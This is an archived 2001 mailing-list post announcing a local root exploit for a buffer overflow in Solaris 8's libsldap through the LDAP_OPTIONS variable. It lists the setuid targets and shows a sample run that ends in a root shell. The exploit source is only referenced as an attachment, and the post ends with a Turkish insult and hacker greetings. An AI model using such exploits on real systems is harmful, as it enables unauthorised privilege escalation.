|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Noir Desir (noir
gsu.linux.org.tr)Date: Thu Jul 05 2001 - 06:14:09 CDT
Hi,
I wish to free this one since it has been made public by some
ppl. libsldap hole has been
known for long. As far as I know, swayhack.co.za did actually found the
hole several months
ago and generously let me know about it. All propz goes to him. Thanks
bro.
Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
success.
I usually support the anti-sec movement but I got my reasons to publish
the exploit.
If you want to know why, please do mail me.
$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: noirgsu.linux.org.tr
Bug discovery: swayhack.co.za
Usage: ./libsldap-exp target#
target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64
$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#
PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak.
Haberin olsun istedim : )
Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos
cheers,
noir
- TEXT/PLAIN attachment: libsldap-exp.c
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]